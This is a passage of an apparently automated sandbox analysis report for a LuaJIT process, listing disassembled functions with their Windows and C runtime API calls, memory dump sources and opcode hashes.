                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                        • Instruction ID: 3b893794b7f93dec5f8a3272d78acc1db39c44a1b3a4840e80acec9b03b49a47
                                                                                                                                                                        • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                        • Instruction Fuzzy Hash: B1F01272A08A8482D720AB00F44071BFBA0F7D5788F600524EACC47B68CF7ED5A48F44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A8ADA0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                        • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                        • Instruction ID: 244a75327afa08739c3b8f1de23a66a9ce8aee34ccec8a2934f75b435c092ce5
                                                                                                                                                                        • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                        • Instruction Fuzzy Hash: 44D0C932A28F8191D744EB16F88510AB7A4FBD5780F908425EAC942A38DF3CC1A98F44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B08FD9 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3ac4ccb1f1c915e5befafdfacddc3bf375b590ed3ac84c67d6b32a6c8bc94b00
                                                                                                                                                                        • Instruction ID: dd7e251fda98328e68101a27ba245aef976251e1524967a7894f980faf9816cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ac4ccb1f1c915e5befafdfacddc3bf375b590ed3ac84c67d6b32a6c8bc94b00
                                                                                                                                                                        • Instruction Fuzzy Hash: A351E331814E0F9BD6A9EF25C888EA1F2E1FF04311F954378C95DD7581EB38A891DB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B09493 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 30cfa19c150b46d23f1cd31586d476eaef86d845c32cb19d28763e88032111ea
                                                                                                                                                                        • Instruction ID: 74e3733f542c868aaa56c014e7f01d52fb917a936bf15d0c44f87417f6f5f52f
                                                                                                                                                                        • Opcode Fuzzy Hash: 30cfa19c150b46d23f1cd31586d476eaef86d845c32cb19d28763e88032111ea
                                                                                                                                                                        • Instruction Fuzzy Hash: EB41C731818B0E6ADAAABE2598C8A64F291FB55325FD10374D818D35C2FB347891D5E3
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00007FF738B1A03C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF738B0A9A0: GetLastError.KERNEL32(?,?,?,00007FF738B0CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B0A9AF
                                                                                                                                                                          • Part of subcall function 00007FF738B0A9A0: SetLastError.KERNEL32(?,?,?,00007FF738B0CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B0AA4D
                                                                                                                                                                        • TranslateName.LIBCMT ref: 00007FF738B1A0A9
                                                                                                                                                                        • TranslateName.LIBCMT ref: 00007FF738B1A0E4
                                                                                                                                                                        • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF738B0717C), ref: 00007FF738B1A129
                                                                                                                                                                        • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF738B0717C), ref: 00007FF738B1A151
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                        • API String ID: 2136749100-905460609
                                                                                                                                                                        • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                                                                                                                                        • Instruction ID: 3cbfc327b91b69ef45dae646443941525879e214be89988f2471a8c781f4aece
                                                                                                                                                                        • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D91BE23A08783E1E760BF21D4016B9E3A6AB84B80F945131DA4D4B786DF3EF551D36A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B1AA70 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3939093798-0
                                                                                                                                                                        • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                                                                                                                                        • Instruction ID: 9bf1eae73eac93010da4b37073594665901f9534f429a61010edf102b1643787
                                                                                                                                                                        • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                                                                                                                                        • Instruction Fuzzy Hash: 03719023B04643AAFB10AB60D8506BDE3A6AF44784F945131CA0D4B695EF3EF445E36A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ADD9D4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                        • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                                                                                                                                        • Instruction ID: e9effeab0e4d422aa5dce8066608813e0563ec44e8de3a40f96d4ef68f501277
                                                                                                                                                                        • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                                                                                                                                        • Instruction Fuzzy Hash: F0317273609BC296EB609F60E8507EEB364FB84744F84443ADA4D87B98DF39D548C724
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B129E0 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 435049134-0
                                                                                                                                                                        • Opcode ID: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                                                                                                                                        • Instruction ID: d4d47a08f1a0591db6b3c2c2eb6c29b050d8181965e7f849c899fac74d983142
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 43B10423F0865365EB20FF31D8415B9E362BB84784F844135EE9C4BA95DF3EE441A369
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B04828 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1405656091-0
                                                                                                                                                                        • Opcode ID: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                                                                                                                                        • Instruction ID: 7ad3e87250d0608434d748d136f4158ca6ff5c21082fdc1e3500ebc750a0994e
                                                                                                                                                                        • Opcode Fuzzy Hash: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 4491F4B3B043474BEB58AF25C9417B8E395EB44788F848039DA1D8A789EF3DE6409716
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B08900 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                        • Opcode ID: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                                                                                                                                        • Instruction ID: 5232777e0f751741baac299c10d1cd01c2dc49df5f9a0b90eca141468f290f3c
                                                                                                                                                                        • Opcode Fuzzy Hash: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 3531A233608B8296DB60DF25E8407AEB3A0FB88794F900136EA9D43B58DF3DD145CB15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ABAD60 Relevance: 7.8, APIs: 5, Instructions: 347COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::rsfun
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3764944385-0
                                                                                                                                                                        • Opcode ID: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                                                                                                                                        • Instruction ID: ac91d1317e243e386aa63c319466fbbf232e78043dc27f657ca278798cd1468d
                                                                                                                                                                        • Opcode Fuzzy Hash: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                                                                                                                                        • Instruction Fuzzy Hash: DD020033A196858BD771DB19E480A2EF7E0F788744F504225FA8E87B98DA3DE841DF14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0C47C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1443284424-0
                                                                                                                                                                        • Opcode ID: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                                                                                                                                        • Instruction ID: d5ff933f37ed487f8c18c8f8d9598872de797872169d6bc918f48f5760237c44
                                                                                                                                                                        • Opcode Fuzzy Hash: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                                                                                                                                        • Instruction Fuzzy Hash: 74E110B3B08782AAE700DB64D0505ADFBB1FB447C8B804122DE6E57B99CF3AD406D316
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B12C74 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF738B12CA2
                                                                                                                                                                          • Part of subcall function 00007FF738B123E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B123F4
                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF738B12CB3
                                                                                                                                                                          • Part of subcall function 00007FF738B12380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B12394
                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF738B12CC4
                                                                                                                                                                          • Part of subcall function 00007FF738B123B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B123C4
                                                                                                                                                                          • Part of subcall function 00007FF738B09294: HeapFree.KERNEL32(?,?,?,00007FF738B18C78,?,?,?,00007FF738B18FFB,?,?,00000019,00007FF738B196D0,?,?,?,00007FF738B19603), ref: 00007FF738B092AA
                                                                                                                                                                          • Part of subcall function 00007FF738B09294: GetLastError.KERNEL32(?,?,?,00007FF738B18C78,?,?,?,00007FF738B18FFB,?,?,00000019,00007FF738B196D0,?,?,?,00007FF738B19603), ref: 00007FF738B092BC
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF738B12ED0), ref: 00007FF738B12CEB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                        • Opcode ID: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                                                                                                                                        • Instruction ID: 587344b4cdd523782261e24a84e9912c0c5ef839494d9c7e7d0ecfdc0b61ee67
                                                                                                                                                                        • Opcode Fuzzy Hash: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                                                                                                                                        • Instruction Fuzzy Hash: DE61E633A08653A6E720FF31E8815B9E361FB48784FC44135EA8D47A95DF3EE500A769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B128FC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                        • String ID: ?
                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                        • Opcode ID: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                                                                                                                                        • Instruction ID: 3111056fe071659bc986dfde161b5ffe5328d463c40361529c5962b9e5bc8c54
                                                                                                                                                                        • Opcode Fuzzy Hash: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
